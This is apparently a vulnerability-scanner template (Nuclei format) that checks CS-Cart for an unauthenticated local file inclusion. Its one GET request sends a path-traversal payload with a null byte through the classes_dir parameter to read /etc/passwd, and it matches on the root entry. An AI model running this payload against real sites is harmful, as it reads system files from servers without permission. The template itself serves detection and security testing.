id: cs-cart-unauthenticated-lfi

info:
  name: CS-Cart - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: CS-Cart is vulnerable to local file inclusion because it allows remote unauthenticated attackers to access locally stored files and reveal their content.
  reference:
    - https://cxsecurity.com/issue/WLB-2020100100
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 1
  tags: cscart,lfi

http:
  - method: GET
    path:
      - "{{BaseURL}}/classes/phpmailer/class.cs_phpmailer.php?classes_dir=../../../../../../../../../../../etc/passwd%00"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200

# digest: 4a0a00473045022100c6de1e576ff33f4523ffb2d443a81b0ee3e0dcbd2d584a158f528c6eed0bff2902204e43cec36d4a5fec75677b89567626c8023f556dac9fb50da887482209a6bb02:922c64590222798bb761d5b6d8e72950
